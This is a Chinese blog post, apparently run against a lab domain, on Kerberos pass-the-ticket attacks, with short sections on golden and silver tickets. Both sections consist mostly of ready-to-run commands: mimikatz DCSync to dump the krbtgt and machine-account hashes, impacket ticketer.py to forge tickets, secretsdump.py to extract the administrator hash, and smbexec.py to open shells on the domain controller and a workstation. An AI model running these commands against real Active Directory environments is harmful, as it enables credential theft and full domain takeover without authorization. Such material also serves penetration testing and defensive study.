PTT 票据传递攻击

news/2025/2/22 5:33:55

黄金票据

原理:获取 krbtgt 的哈希后,使用此哈希能离线生成任意域用户的 tgt,域管理员的 tgt 就是黄金票据。

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:HACK.com /user:HACK\krbtgt /csv" "exit"
​
58d7afab7f5f7ca0d4a6295ada00fd8e

# 生成黄金票据
python3 ticketer.py -domain-sid S-1-5-21-2992640285-1035252920-1077850616 -nthash 58d7afab7f5f7ca0d4a6295ada00fd8e -domain HACK.com administrator
# 导入票据
export KRB5CCNAME=administrator.ccache
# 导出 administrator 用户的哈希
​
python3 secretsdump.py -k -no-pass administrator@DC01.HACK.com -dc-ip 192.168.72.21 -just-dc-user HACK/administrator
​
# 访问域控 DC01
python3 smbexec.py -no-pass -k administrator@DC01.HACK.com -dc-ip 192.168.72.21
​
# 访问域内主机 win10
python3 smbexec.py -no-pass -k administrator@WIN10-02.HACK.com -dc-ip 192.168.72.21 -codec gbk


mimikatz.exe
#生成并导入黄金票据到当前内存中
​
kerberos::golden /user:administrator /domain:HACK.com /sid:S-1-5-21-2992640285-1035252920-1077850616 /krbtgt:58d7afab7f5f7ca0d4a6295ada00fd8e /ptt
​
#验证是否成功,导出指定用户哈希
lsadump::dcsync /domain:HACK.com /all /csv

白银票据

原理:获取某个服务账户的哈希后,使用普通域用户访问此服务后,使用获得的哈希解密 st 服务票据,然后给 pac 添加一个高权限用户,并使用此哈希伪造 PAC_SERVER_CHECKSUM 签名。而 PAC_PRIVSVR_CHECKSUM 签名伪造需要 krbtgt 的哈希,但是此签名可选且默认不开启,直接忽视。

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:HACK.com /user:DC01$ /csv" "exit"
​
32538b59408163c76f5439225907c28e

#生成白银票据
python3 ticketer.py -domain-sid S-1-5-21-2992640285-1035252920-1077850616 -nthash 32538b59408163c76f5439225907c28e -spn cifs/DC01.HACK.com -domain HACK.com administrator
​
#导入票据
export KRB5CCNAME=administrator.ccache
​
#导出 administrator 用户的哈希
python3 secretsdump.py -k -no-pass administrator@DC01.HACK.com -dc-ip 192.168.72.21 -just-dc-user HACK/administrator
​
#访问域控 DC01
python3 smbexec.py -no-pass -k administrator@DC01.HACK.com -dc-ip 192.168.72.21


http://www.niftyadmin.cn/n/5861643.html

相关文章

H5--开发适配

在 H5 开发中,适配不同设备和屏幕尺寸至关重要,它能确保页面在各种环境下都有良好的显示效果和用户体验。以下介绍几种常见的 H5 开发适配方案: 视口(Viewport)设置 视口单位是相对于浏览器视口的尺寸进行度量的单位&…

【论文阅读】identifying backdoor data with optimized scaled prediction consistency

https://zhuanlan.zhihu.com/p/17155805706 后门秘密被揭开:用优化的尺度预测一致性识别后门数据 先前的后门防御策略主要集中在识别带有后门的模型或被污染数据的特征,通常假设能够访问到干净的数据。本文深入探讨了一个相对未被充分研究的挑战&#x…

istio介绍补充以及使用篇

istio介绍补充以及使用篇 前言 介绍istio各个组件创建istio的方式手动注入自动注入side car 使用istio做流量灰度如有需要收藏的看官,顺便也用发财的小手点点赞哈,如有错漏,也欢迎各位在评论区评论! 前言 前篇istio介绍了引入ist…

DeepSeek 提示词:定义、作用、分类与设计原则

🧑 博主简介:CSDN博客专家,历代文学网(PC端可以访问:https://literature.sinhy.com/#/?__c1000,移动端可微信小程序搜索“历代文学”)总架构师,15年工作经验,精通Java编…

跳跃游戏II(力扣45)

这道题在跳跃游戏(力扣55)-CSDN博客 的基础上需要找到最小的跳跃次数。那么我们需要用一个变量来统计跳跃次数,而难点就在于何时让该变量的值增加。这一点我写在注释中,大家结合我的代码会更好理解。其他部分跟跳跃游戏(力扣55)-CSDN博客 几乎相同&#…

LLM+多智能体协作:基于CrewAI与DeepSeek的邮件自动化实践

文章目录 引言理解 Flows(工作流)与 Crews(协作组)一、环境准备与工具安装1.1 Python环境搭建1.2 创建并激活虚拟环境1.3 安装核心依赖库(crewai、litellm) 二、本地DeepSeek R1大模型部署2.1 Ollama框架安…

【Linux-网络】深入拆解TCP核心机制与UDP的无状态设计

🎬 个人主页:谁在夜里看海. 📖 个人专栏:《C系列》《Linux系列》《算法系列》 ⛰️ 道阻且长,行则将至 目录 📚引言 📚一、UDP协议 📖 1.概述 📖 2.特点 &#x1…

CMU Sphinx、Kaldi 和 Mozilla DeepSpeech 三个开源语音识别引擎的综合比较

CMU Sphinx、Kaldi 和 Mozilla DeepSpeech 三个开源语音识别引擎的综合比较与评估,涵盖技术特点、部署复杂度、适用场景及优缺点分析: 1. CMU Sphinx 技术特点 模型基础:基于传统的隐马尔可夫模型(HMM)和 N-gram 语言…